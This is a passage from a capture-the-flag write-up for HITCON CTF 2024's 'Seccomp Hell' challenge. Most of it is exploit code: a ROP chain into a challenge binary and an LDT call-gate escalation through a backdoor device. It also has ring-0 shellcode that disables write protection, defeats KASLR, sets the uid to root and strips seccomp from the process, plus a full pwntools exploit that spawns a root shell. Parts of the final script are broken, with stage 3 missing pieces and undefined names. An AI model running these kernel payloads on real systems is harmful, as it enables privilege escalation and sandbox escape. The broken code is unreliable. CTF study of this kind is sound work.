jl FAIL

{shc.echo("[+] cpy trampolin\n")}
{shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
lea rsi, [rip+TRAMPOLIN]
{shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

// call CALL GATE for privilige escalation
{shc.echo("[+] go to CPL 0\n")}
call FWORD PTR ds:{PIVOT-0xa6b00}

// should be root
{shc.echo("[+] spawning shell\n")}
{shc.sh()}

{shc.echo("[+] END\n")}
int 3

FAIL:
mov rbx, rax
neg rbx
{shc.echo("[-] errno: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
{shc.echo("\n[-] FAIL\n")}
int 3

TRAMPOLIN:
""") + trampolin)
```

</details>

### Stage 5.1: call gate trampolin

the trampolin stays the same as in the [one_byte writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/).

Stage 5.1:

```python
TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
PERCPU_CURRENT=0x1fbc0

ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute
trampolin = asm(f"""
cli

// Read LSTAR to bypass KASLR
mov ecx, {MSR_LSTAR}
rdmsr
shl rdx, 32
or rdx, rax
subq rdx, {KASLR_LSTAR}
movq rbp, rdx

// Disable WP
movq r8, cr0
andq r8, {(~(1 << 16))}
movq cr0, r8

// Copy stage 5.2 to the mapped kernel entry point
movq rdi, rbp
addq rdi, {KASLR_WRITE_TO}
movq r15, rdi
lea rsi, [rip+RING_0]
mov ecx, {RING0_LEN}
rep movsb

// Jump there.
jmp r15

RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)
```

</details>

## Sandbox (Seccomp)

Finally let's try to write shellcode to disable seccomp.

### Stage 5.2: ring 0 payload

For ring0 we will need to make some adjustions. The privilige escalation stays the same as in our PoC, but we will have to find some way to disable seccomp, even though we found [this writeup](https://keksite.in/posts/Seccomp-Bypass/) about disabling seccomp it isn't helpfull anymore, because the x86 linux kernel changed the way seccomp works in newer version, but it gives us some important starting points: current (task\_struct).

Lets first look at the [task\_struct](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748), which simply includes a struct called [seccomp](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22):

[include/uapi/linux/seccomp.h](https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10):
```c
/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED 0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */
```

> Note: `SECCOMP_MODE_DISABLED` is not a valid mode to set using prctl [Source Code](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2084)

[include/linux/sched.h](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22):
```c
struct seccomp {
int mode;
atomic_t filter_count;
struct seccomp_filter *filter;
};
```

So can we just manually set the mode to `SECCOMP_MODE_DISABLED` ? ... no
I also tried overwriting other parts in the seccomp struct, but none of this worked either. Ok let's go deeper down the rabbid hole and look at [seccomp_filter](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L226)

[kernel/seccomp.c](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L226):
```c
struct seccomp_filter {
refcount_t refs;
refcount_t users;
bool log;
bool wait_killable_recv;
struct action_cache cache;
struct seccomp_filter *prev;
struct bpf_prog *prog;
struct notification *notif;
struct mutex notify_lock;
wait_queue_head_t wqh;
}
```

No luck either, also manually patching the instructions [bpf\_prog](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/bpf.h#L1528) didn't work.

> Note: i didn't try messing with the flags to e.g. disable jited, so this might have worked

So what now? ... Well if we look ath the seccomp\_filter struct we see a member called `prev`, interesting let's look at the [source code](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046) for adding seccomp filters:

basically the seccomp\_filters are a linked list, where as new filters replace the current root entry.

so let's first try to add a simple rules that allows everything.

```c
#define ALLOW_PROCESS \
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

void allow_all() {

struct sock_filter seccomp_filter[] = {
ALLOW_PROCESS,
};

struct sock_fprog prog = {
.len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
.filter = (struct sock_filter*)&seccomp_filter,
};

assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}
```

which basically creates a struct that looks like this:

```
00:0000│ rdx rsp 0x7fffffffe750 ◂— 1
01:0008│-018 0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010│-010 0x7fffffffe760 ◂— 0x7fff000000000006
```

and add it by calling [do\_seccomp](https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046) directly.

Well this added our rules to the top of our linked list and incremented the `filter_count`, but we still can't call new syscalls. This is because `SECCOMP_RET_KILL_PROCESS` takes precidents over `SECCOMP_RET_ALLOW` according to [man pages](https://www.man7.org/linux/man-pages/man2/seccomp.2.html).

But what we can do now is manually reduce the `seccomp.filter_count` to 1 and remove our previous seccomp\_filter `seccomp->filter_count.prev = NULL` and we successfully disabled seccomp.

Stage 5.2:

```python
PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
1, # size
PAYLOAD+0x18, # args (ptr to rules)
0x7fff000000000006, # rules (RETURN ALLOW)
)

PTI_SWITCH_MASK=0x1000

KASLR_WRITE_TO=0xbad000

# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0

SECCOMP_SET_MODE_FILTER=1

# current struct offset from gs
CURRENT=0x34940

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// and rdi, {~0xffffff}
sub rdi, {KASLR_WRITE_TO +0x400000}
and rdi, {~0xfffff}
mov r15, rdi

// add fake seccomp filter, allow all
lea rax, [r15+{DO_SECCOMP}]
mov rdi, {SECCOMP_SET_MODE_FILTER}
xor rsi, rsi
mov rdx, {PAYLOAD+0x8}
call rax

// privilige escalation
// crpt_cred = prepare_cred();

lea rax, [r15+{PREP_CRED}]
call rax

// crpt_cred.uid = 0;
// crpt_cred.gid = 0;
mov rdi, rax
movq [rdi+8], 0

// commit_creds(crpt_cred);
lea rax, [r15+{COMMIT_CRED}]
call rax

// DISABLE SECCOMP

// get current
movq rax, qword ptr gs:[{CURRENT}]

// current.seccomp.count = 1 (was 2, fake and init)
mov dword ptr[rax+0xc6c], 1

// get current.seccomp.seccomp_filter
mov rax, qword ptr[rax+0xc70]
// get current.seccomp.seccomp_filter->prev = NULL
mov qword ptr[rax+0x90], 0

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
orq rsp, {1 << 9}
pushq r9
pushq r8
iretq

""")

```

</details>

## Final stage: get flag

At this point everthing should be straightforward, but sadly this version worked, but had a pretty bad successrate. This is because of the calls probably reenable interrupts, as mentioned in [one_byte writeup](https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/). But this exploit was good enough to get the flag.

`/root/flag.txt`
<details>

```
NOPE <3
Please get a full root shell
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣆⡐⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⢿⠿⠿⠿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣸⣮⢰⣄⣸⡇⠄⠀⠠⠀⠀⠀⠀⢀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⡗⡽⠤⠉⣹⠇⠀⠁⡄⠀⠀⡀⠀⠀⠁⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⢴⣫⣝⣉⣽⡁⠀⠀⠀⠇⠀⠈⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠁⣲⡵⢻⣧⡎⡰⢋⣷⣤⣔⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠐⠄⠀⢀⣠⣶⣿⣿⣅⣺⣿⡋⢀⣾⣿⣿⣿⣿⣿⣿⣆⠀⠃⢀⠎⠀⠀⠀
⠀⠀⠀⠀⠀⠐⠀⠈⠂⠀⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠈⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢃⠀⠃⢈⣿⣿⣿⣿⣿⣏⢸⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣋⠝⣿⣿⣿⣿⣿⣿⣷⣄⠃⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣭⣽⣘⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠀⢸⣿⣿⣭⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⠿⠟⠀⡀⠀
⠀⠀⢈⠒⡀⠀⠀⠀⠀⠈⢛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⢀⠐⡀⠀
⣀⢠⠊⢀⠰⠀⠀⠀⠠⢀⠀⢐⡈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠠⠈⡐⠂⠐⡄⢀
```

</details>

Actually this wasn't the flag, we need to actually use our root shell to find the flag.

using `find / -name '*flag*' 2> /dev/null` we find a flag generator `/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag`, that we can execute the get the flag.

```python
while (out := rl().rstrip()) != b'[+] spawning shell' :
linfo(out.decode())

linfo(out.decode())

linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', 'find / -name '*flag*' 2> /dev/null')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()
```

## improving success rate

After the CTF concluded I talked with others that solved the challenge and realized why my successrate was so bad, it was the calls. So inspired by other peoples solution I rewrote my shellcode to have a way better successrate.

For privilige escalation we manually edit the `cred` struct, that is linked in `current` to become root (normally there are credand real\_cred), but in this scenario they are the same so we simply edit the uid and gid of one to become root .

Disabling seccomp is more interesting, basically in [thread\_info](https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64) there is an attribute called [syscall\_work](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51) that set's flags for e.g. enabling seccomp. So what we need to do is to unset the flag and we can now execute all syscalls. But this only works for the current work\_struct, if we `execve` another binary seccomp get's reset.

So additionally we need to set the [seccomp->mode]([seccomp](https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22)) to [SECCOMP\_MODE\_DISABLED](https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10)

Stage 5.2 (improved):

```python
PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

/* PROLOGUE */

// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// get current
movq r15, qword ptr gs:[{CURRENT}]

/* PRIVILIGE ESCALATION */

// current->cred.uid = 0
mov rax, qword ptr[r15+{CRED_OFF}]
mov dword ptr[rax+{UID_OFF}], 0

/* DISABLE SECCOMP */

// current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

// current.seccomp.mode = SECCOMP_MODE_DISABLED
mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

/* EPILOG */

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
orq rsp, {1 << 9}
pushq r9
pushq r8
iretq

""")
```

</details>

## Exploit

Flag: `hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}`

exploit.py:

```python
#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost'
PORT = int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
'SHLVL':'2',
'HOME':'/',
'TERM':'linux',
'PWD':'/',
'SOCAT_PID':'190',
'SOCAT_PPID':'189',
'SOCAT_VERSION':'1.7.3.0',
'SOCAT_SOCKADDR':'10.0.2.15',
'SOCAT_SOCKPORT':'22222',
'SOCAT_PEERADDR':'10.0.2.2',
'SOCAT_PEERPORT':'54394'
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000

c"""

context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(y) < s else se(x, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)

vm = None
def get_target(**kw):
global vm

if args.REMOTE or args.TEST:
# context.log_level = 'debug'
return remote(IP, PORT)

if args.LOCAL:
if args.GDB:
return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
return process([BINARY] + ARGS, env=ENV, **kw)

try:
from vagd import Dogd, Qegd, Box # only load vagd if needed
except:
log.error("Failed to import vagd, either run locally using LOCAL or install it")
if not vm:
vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True) # Docker
# vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True) # Qemu
if vm.is_new:
log.info("new vagd instance") # additional setup here
return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)

t = get_target()

#############################################
# STAGE 1: ROP BACKDOOR #
#############################################

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b''

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

#############################################
# STAGE 2: PIVOT ROP #
#############################################

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
0: std,
0x10: b'STAGE 2',
0x18: b'STAGE 3',
0x20: b'FAIL',
0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

#############################################
# STAGE 5.2: RING 0 PAYLOAD #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111
CRED_OFF=0xb80
UID_OFF=8

ring0 = asm(f"""

/* PROLOGUE */

// Get access to per-cpu variables (current, mostly) via swapgs
swapgs

// Get the current page table.
movq rbx, cr3

// Switch to the kernel page table.
andq rbx, {~PTI_SWITCH_MASK}
movq cr3, rbx

// get current
movq r15, qword ptr gs:[{CURRENT}]

/* PRIVILIGE ESCALATION */

// current->cred.uid = 0
mov rax, qword ptr[r15+{CRED_OFF}]
mov dword ptr[rax+{UID_OFF}], 0

/* DISABLE SECCOMP */

// current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

// current.seccomp.mode = SECCOMP_MODE_DISABLED
mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}

/* EPILOG */

// Swap back
swapgs

// Switch the page table back around
orq rbx, {PTI_SWITCH_MASK}
movq cr3, rbx

// Build an `iret` stackframe rather than a `ret far` stack frame.
// => %rip
popq r8
// => %cs
popq r9

pushfq
// Set IF in the new RFLAGS (like sti)
orq rsp, {1 << 9}
pushq r9
pushq r8
iretq

""")

#############################################
# STAGE 5.1: CALL GATE TRAMPOLIN #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
KASLR_WRITE_TO=0xbad000
PERCPU_CURRENT=0x1fbc0

RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute
trampolin = asm(f"""
cli

// Read LSTAR to bypass KASLR
mov ecx, {MSR_LSTAR}
rdmsr
shl rdx, 32
or rdx, rax
subq rdx, {KASLR_LSTAR}
movq rbp, rdx

// Disable WP
movq r8, cr0
andq r8, {(~(1 << 16))}
movq cr0, r8

// Copy stage 5.2 to the mapped kernel entry point
movq rdi, rbp
addq rdi, {KASLR_WRITE_TO}
movq r15, rdi
lea rsi, [rip+RING_0]
mov ecx, {RING0_LEN}
rep movsb

// Jump there.
jmp r15

RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)

#############################################
# STAGE 4: KERNEL BACKDOOR, LDT CALL GATE #
#############################################

far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
{shc.echo("STAGE 4")}

{shc.echo("[+] INIT\n")}

{shc.pushstr("/dev/i_am_definitely_not_backdoor")}
{shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
cmp rax, 0
jl FAIL

mov rbx, rax
{shc.echo("[+] backdoor fd: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

{shc.echo("\n[+] START\n")}

// disable SMAP
{shc.echo("[+] 'stac' in CPL3\n")}
pushfq
or QWORD PTR [rsp],0x40000
popfq

{shc.echo("[+] modify_ldt user\n")}
mov rax, 0x100001000
push rax
mov rax, 0x100000000c
push rax
mov rsi, rsp

{shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

{shc.echo("[+] modify_ldt high\n")}

mov rax, 0x380000FFFF
push rax
mov rax, 0xFFFF0000000E
push rax
mov rsi, rsp

{shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

{shc.echo("[+] write to backdoor\n")}
{shc.pushstr('TEST')}
mov rsi, rsp
{shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
cmp rax, 0
jl FAIL

// should be root
{shc.echo("[+] spawning shell\n")}
{shc.sh()}
jmp FAIL

FAIL:
mov rbx, rax
neg rbx
{shc.echo("[-] errno: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
{shc.echo("\n[-] FAIL\n")}
int 3

TRAMPOLIN:
""") + trampolin).ljust(0x500, asm('nop'))

#############################################
# STAGE 3: LOAD ENCODED PAYLOAD #
#############################################

PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

// jmp to next stage
mov rax, {PAYLOAD+0x8}
jmp rax

FAIL:
{shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
int 3
"""))

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
# hex starting a 'A'
# and least significant nibble first

payload_enc = b''
for b in payload:
lo = (b & 0xf) + 0x41
hi = ((b & 0xf0) >> 4) + 0x41
payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell' :
linfo(out.decode())

linfo(out.decode())

#############################################
# FINAL STAGE: GET FLAG #
#############################################

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

```

</details>

Original writeup (https://w0y.at/writeup/2024/07/16/hitcon-ctf-2024-quals-seccomp-hell.html).

Seccomp Hell

Comments

Sign in with